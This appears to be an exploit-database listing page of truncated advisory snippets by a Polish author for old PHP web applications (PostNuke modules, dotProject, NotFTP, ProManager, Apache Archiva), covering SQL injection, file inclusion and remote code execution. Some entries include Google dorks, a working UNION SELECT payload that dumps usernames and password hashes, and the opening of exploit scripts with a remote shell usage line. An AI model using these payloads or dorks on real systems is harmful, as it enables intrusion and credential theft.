PostNuke Module pnFlashGames <= 2.5 - SQL Injection Vulnerabilities

No description provided by source. Vuln: Postnuke Mod pnFlashGames Blind SQL/SQL all version Vulnerability Author: Vulnerability search Kacper kacper1964atyahoo.pl dork: inurl:index.php?module=pnFlashGames Author Homepage: http://devilteam.pl/ If magicquotesgpc = off -==== Vuln to old 2 version:...

dotProject <= 2.0.4 (baseDir) Remote File Include Vulnerability

No description provided by source. / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - dotProject = 2.0.4 baseDir Remote File Include Vulnerabilities + - Script name: dotProject v. 2.0.4 - Script site: http://www.dotproject.net/ + + + - Find by: Kacper a.k.a Rahim + - Contact:...

Apache Archiva 1.3.6 => Remote Command Execution Vulnerability

Exploit for multiple platform in category web applications Apache Archiva 1.3.6 = Remote Command Execution Author: Kacper Contact: infoatdevilteam.pl Home Page: https://devilteam.pl/ Vendor: http://archiva.apache.org/ Dork: "Apache Archiva \ Browse Repository" Description: Apache Archiva use Apac...

WordPress Plugin Photoracer 1.0 - &#039;id&#039; SQL Injection

Wordpress Photoracer Plugin = SQL injection http://wordpress.org/extend/plugins/photoracer/ Author: Kacper Website: http://devilteam.pl/ Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, Pozdro: Ratman, Kopaczka, FDJ Elo: dla GLOBUSa za pomoc w crackowaniu hasel. Vuln:...

NotFTP 1.3.1 - &#039;newlang&#039; Local File Inclusion

NotFTP 1.3.1 = Local file include http://sourceforge.net/projects/notftp/ Author: Kacper Email: [email protected] Home: http://devilteam.pl/ DC++ Hub address: bluber-hub.no-ip.biz:2008 Vuln: File config.php: This is where we decide what language to use. Don't mess with this either. if...

NotFTP 1.3.1 - newlang Local File Inclusion

NotFTP 1.3.1 - newlang Local File Inclusion NotFTP 1.3.1 = Local file include http://sourceforge.net/projects/notftp/ Author: Kacper Email: [email protected] Home: http://devilteam.pl/ DC++ Hub address: bluber-hub.no-ip.biz:2008 Vuln: File config.php: This is where we decide what language to us...

PostNuke Module pnFlashGames 2.5 - SQL Injection

Vuln: Postnuke Mod pnFlashGames Blind SQL/SQL all version Vulnerability Author: Vulnerability search Kacper kacper1964atyahoo.pl dork: inurl:"index.php?module=pnFlashGames" Author Homepage: http://devilteam.pl/ If magicquotesgpc = off -==== Vuln to old 2 version:...

PostNuke Module pnFlashGames 2.5 - SQL Injection

PostNuke Module pnFlashGames 2.5 - SQL Injection Vuln: Postnuke Mod pnFlashGames Blind SQL/SQL all version Vulnerability Author: Vulnerability search Kacper kacper1964atyahoo.pl dork: inurl:"index.php?module=pnFlashGames" Author Homepage: http://devilteam.pl/ If magicquotesgpc = off -==== Vuln to...

PostNuke Module PostSchedule (eid) SQL Injection Vulnerability

No description provided by source. Vuln: Postnuke Mod PostSchedule SQL Vuln Author: Vuln search Kacper kacper1964atyahoo.pl google:"PostSchedule ver 1" Vuln:...

postnukeschedule-sql.txt

Vuln: Postnuke Mod PostSchedule SQL Vuln Author: Vuln search Kacper kacper1964atyahoo.pl google:"PostSchedule ver 1" Vuln: index.php?module=PostSchedule&view=event&eid=-1'+union+select+0,1,2,3,4,5,6,7,8,concatpnuname,char58,pnpass,10,11,12,13//from//nukeusers//where//pnuid=2/ $Severo: Moga byc...

si2007-sql.txt

Homepage: http://devilteam.eu/ 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa...

Katalog Plyt Audio Index.PHP SQL注入漏洞

Katalog Plyt Audio是基于PHP的WEB应用程序。 Katalog Plyt Audio多个产品不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，可获得敏感信息。 问题是'Index.PHP'脚本对用户提交的WEB参数缺少过滤，提交恶意SQL代码作为参数数据，可导致更改原来的SQL逻辑，获得敏感信息。 Katalog Plyt Audio Katalog Plyt Audio 1.0 目前没有解决方案提供： http://cdaudio.ovh.org/ ? / Author: Kacper Contact: [email protected]...

KGB &lt;= 1.9 Remote Code Execution Exploit

No description provided by source. ? //Kacper & str0ke Settings $exploitname = "KGB = 1.9 Remote Code Execution Exploit"; $scriptname = "KGB 1.9"; $scriptsite = "http://www.kgb.xs.com.pl/index.php?tri=2"; $dork = 'inurl:"kgb19"'; // print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+:...

SZEWO PhpCommander Download.PHP本地文件包含漏洞

SZEWO PhpCommander是一款基于PHP的WEB应用程序。 SZEWO PhpCommander不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限查看系统文件内容。 问题是由于'Download.PHP'脚本对用户提交的WEB参数缺少过滤，提交包含多个"../"字符作为参数数据，可绕过WEB ROOT限制，以WEB进程权限查看系统文件内容。 SZEWO PhpCommander 3.0 http://www.szewo.com/php/commander/eng/ !/usr/bin/php -q -d shortopentag=on $devilteam...

PostNuke 0.763 - PNSV lang Remote Code Execution

PostNuke 0.763 - PNSV lang Remote Code Execution DEVIL TEAM IRC: 72.20.18.6:6667 devilteam ======== Contact: [email protected] or http://www.rahim.webd.pl/ cod3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings DragonHeart and all DEVIL TEAM Patrio...

WSN Forum &lt;= 1.3.4 (prestart.php) Remote Code Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+:...

phpdocwriter.txt

!/usr/bin/perl use LWP::UserAgent; / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - phpdocwriter perl exploit.pl http://site.com/phpdocwriterPath/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd;...

proManager073.txt

/ + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - proManager = 0.73 Add Admin SQL Injection Vulnerabilities + + + - Script name: proManager v.0.73 - Script site: http://sourceforge.net/projects/promanager/ + + + - Find by: Kacper a.k.a Rahim + - Contact: [email protected] - or -...

ProManager 0.73 - note.php SQL Injection

ProManager 0.73 - note.php SQL Injection / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - proManager = 0.73 Add Admin SQL Injection Vulnerabilities + + + - Script name: proManager v.0.73 - Script site: http://sourceforge.net/projects/promanager/ + + + - Find by: Kacper a.k.a Rahim + -...

dotProject 2.0.4 - &#039;baseDir&#039; Remote File Inclusion

/ + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - dotProject = 2.0.4 baseDir Remote File Include Vulnerabilities + - Script name: dotProject v. 2.0.4 - Script site: http://www.dotproject.net/ + + + - Find by: Kacper a.k.a Rahim + - Contact: [email protected] - or -...